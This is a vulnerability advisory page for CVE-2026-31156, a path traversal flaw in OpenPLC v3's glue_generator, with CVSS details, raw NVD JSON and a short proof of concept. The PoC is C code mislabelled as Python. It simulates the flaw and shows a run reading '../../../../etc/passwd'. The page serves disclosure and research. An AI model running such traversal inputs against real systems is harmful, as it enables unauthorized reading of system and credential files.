Security Vulnerability Report
中文
CVE-2026-31156 CVSS 6.5 MEDIUM

CVE-2026-31156

Published: 2026-05-13 16:16:39
Last Modified: 2026-05-14 15:16:45
Source: [email protected]

Description

A path injection vulnerability exists in OpenPLC v3 (2c82b0e79c53f8c1f1458eee15fec173400d6e1a) as the binary program compiled from glue_generator.cpp does not perform any validation on the file path parameters passed via the command line. The user-controlled input parameters are directly passed to the underlying file operation functions (fopen/ifstream/ofstream) for file reading and writing. An attacker can exploit this vulnerability by constructing a malicious path to read arbitrary readable files.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

OpenPLC v3 (commit 2c82b0e79c53f8c1f1458eee15fec173400d6e1a)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-31156 Path Injection // The vulnerable binary accepts a file path argument directly. // An attacker can supply a relative path to read arbitrary files. #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { if (argc < 2) { printf("Usage: %s <file_path>\n", argv[0]); return 1; } // Simulating the vulnerable behavior in glue_generator // In the real vulnerability, this path goes to fopen/ifstream without validation char *user_supplied_path = argv[1]; printf("Attempting to open: %s\n", user_supplied_path); FILE *fp = fopen(user_supplied_path, "r"); if (fp == NULL) { perror("Error opening file"); return 1; } char ch; while ((ch = fgetc(fp)) != EOF) { printf("%c", ch); } fclose(fp); return 0; } /* Compilation and Execution: gcc poc.c -o poc_exploit ./poc_exploit "../../../../etc/passwd" */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31156", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:38.763", "lastModified": "2026-05-14T15:16:45.160", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path injection vulnerability exists in OpenPLC v3 (2c82b0e79c53f8c1f1458eee15fec173400d6e1a) as the binary program compiled from glue_generator.cpp does not perform any validation on the file path parameters passed via the command line. The user-controlled input parameters are directly passed to the underlying file operation functions (fopen/ifstream/ofstream) for file reading and writing. An attacker can exploit this vulnerability by constructing a malicious path to read arbitrary readable files."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "http://openplc.com", "source": "[email protected]"}, {"url": "https://github.com/unicorn-hyh/CVE-2026-31156", "source": "[email protected]"}, {"url": "https://github.com/unicorn-hyh/CVE-2026-31156", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.